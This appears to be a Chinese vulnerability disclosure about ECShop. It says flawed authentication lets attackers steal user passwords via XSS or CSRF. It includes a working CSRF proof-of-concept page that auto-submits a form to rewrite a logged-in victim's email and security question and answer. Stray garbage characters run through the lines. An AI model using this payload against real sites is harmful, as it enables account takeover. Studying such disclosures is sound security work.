简要描述:0 M0 r) V E9 U! l7 ?
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现( e8 @$ I+ Z$ y6 T& w7 M3 B7 K
/ \/ d. w# e% X: ADemo For:http://www.wooyun.org/bug.php?action=view&id=395
' @" ~, s9 ?8 k/ z% P$ B0 L4 P( v/ J! y& B
详细说明:2 h* i$ p% t& e5 @
利用csrf和xss可以突破官方所说的“障碍”4 j0 V9 Y# f; k8 Q
xss版本已经有人说明
: A7 X+ b" x8 k- |这里给出csrf版本
( H8 F" @) O* \( }, B+ G7 `1 Z7 s' z) J
漏洞证明:
8 M5 G& m N! H% y, Z# T) h<html>
. r: o# Z( i4 M: V<body>0 J' ?; R+ P4 X: r7 a+ x
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">% g: b* e5 x# U! T4 ~
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
8 B- g Q; p; s<INPUT TYPE="text" NAME="act" value="act_edit_profile">
! ]9 V4 ?9 y$ c6 m<INPUT TYPE="text" NAME="sel_question" value="ecshop">2 A1 G$ I) H# _5 i
<INPUT TYPE="text" NAME="passwd_answer" value="exploit"># B3 f. ~% n! e* Y( o3 h
</body>
8 P2 W( J4 z+ X) ^/ {3 h<script>/ A# I' O2 S* v
document.forms[0].submit();
" B- w/ d% f. Z+ q. z* o" ?</script>' s1 n2 a* s7 h& k7 Y8 Z7 W
</html>
: x. q6 l; u9 V+ k构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失0 ?& `: \/ y% z% v: K) h: W
$ ?6 f+ r5 [* l |